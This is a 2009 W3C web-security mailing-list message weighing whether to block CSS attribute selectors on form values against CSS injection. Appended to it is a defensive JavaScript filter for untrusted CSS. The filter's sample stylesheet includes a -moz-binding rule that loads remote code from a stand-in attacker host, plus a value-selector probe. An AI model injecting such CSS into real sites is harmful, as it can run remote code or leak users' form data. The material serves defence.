- From: Maciej Stachowiak <mjs@apple.com>
- Date: Tue, 08 Dec 2009 10:54:29 -0800
- To: Maciej Stachowiak <mjs@apple.com>
- Cc: gaz Heyes <gazheyes@gmail.com>, Adam Barth <w3c@adambarth.com>, Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
On Dec 8, 2009, at 7:07 AM, Maciej Stachowiak wrote:

> Another possibility is to specifically blacklist the use of the
> contents of the "value" attribute in attribute selectors for
> elements in the HTML namespace. Either all elements, or specifically
> input elements, or more specifically input elements of type password
> or hidden.
>
> I think that is better than making attribute selectors not work with
> those elements at all. People validly use attribute selectors on
> form controls based on the "type" attribute to style them.

I'd like to backpedal from this proposal for a second so I can understand the issue better. Are we worried about:

A) Sites that voluntarily include untrusted CSS (such as user-provided) without filtering being exposed to data theft risk.
B) Sites that have inadvertent CSS injection risk (but without the possibility of script injection) being exposed to data theft risk.
C) Both.

One thing to keep in mind is that including untrusted CSS is already extremely risky. If the attacker can inject CSS (whether willingly or not) he or she can do the following:

1) Arbitrarily move around elements on the page.
2) Make any element invisible.
3) Replace the visible contents of elements with chosen images or text.
4) Overlay one element invisibly on top of another.

Using these, you can make the "Delete Account" button look like a "Mail me a Free Pony" button. This isn't even counting features like -moz-binding or CSS expressions.

Thus, any site doing voluntary injection of CSS must do whitelisting to be safe. Any site with inadvertent CSS injection holes is already at great risk. Thus I am not sure it is worth focusing on attribute selectors specifically as a CSS-based attack vector.

Am I missing anything here?

Regards,
Maciej
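The filtering the message says a site must apply to voluntarily included CSS, as an added example that is not part of this thread: a small JavaScript screen over untrusted CSS text that flags the constructs named above (attribute selectors on `value`, `-moz-binding`, CSS `expression()`) plus `url()` references that leave the page's own origin, while letting `type`-based selectors through. It is a regex-based screen for illustration rather than a full CSS parser, and the sample stylesheet and origins are constructed.

```javascript
// Added example, not code from the thread. Regex-based screen for untrusted
// CSS; a production filter should whitelist properties and selectors rather
// than rely on pattern matching alone (a full CSS parser is assumed absent).

// Attribute selectors on the "value" attribute, e.g. input[value^="a"],
// the construct the message proposes to blacklist for HTML form controls.
const VALUE_ATTR_SELECTOR = /\[\s*value\s*(?:[\^$*~|]?=)/gi;

// Legacy script-in-CSS features named in the message.
const SCRIPT_LIKE = [
  { name: "-moz-binding", re: /-moz-binding\s*:/gi },
  { name: "expression()", re: /expression\s*\(/gi },
];

// Any url() reference; resolved against the page origin below.
const URL_REF = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

// Returns a list of findings ({kind, at[, target]}); empty means nothing flagged.
function auditCss(cssText, pageOrigin) {
  const findings = [];
  for (const m of cssText.matchAll(VALUE_ATTR_SELECTOR)) {
    findings.push({ kind: "value-attribute-selector", at: m.index });
  }
  for (const { name, re } of SCRIPT_LIKE) {
    for (const m of cssText.matchAll(re)) {
      findings.push({ kind: name, at: m.index });
    }
  }
  const ownOrigin = new URL(pageOrigin).origin;
  for (const m of cssText.matchAll(URL_REF)) {
    const target = m[2].trim();
    let origin = null;
    try { origin = new URL(target, pageOrigin).origin; } catch { /* unparsable */ }
    if (origin !== ownOrigin) {
      findings.push({ kind: "cross-origin-url", at: m.index, target });
    }
  }
  return findings;
}

// Constructed sample of user-supplied CSS: one rule styling by type (which the
// message says must keep working) and three rules the screen should flag.
const SAMPLE_CSS = `
input[type="password"] { border: 2px solid red; }
input[value^="s"] { color: red; }
div { -moz-binding: url("https://attacker.example/x.xml#b"); }
span { width: expression(1+1); }
`;

console.log(auditCss(SAMPLE_CSS, "https://app.example"));
```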
Received on Tuesday, 8 December 2009 18:55:03 UTC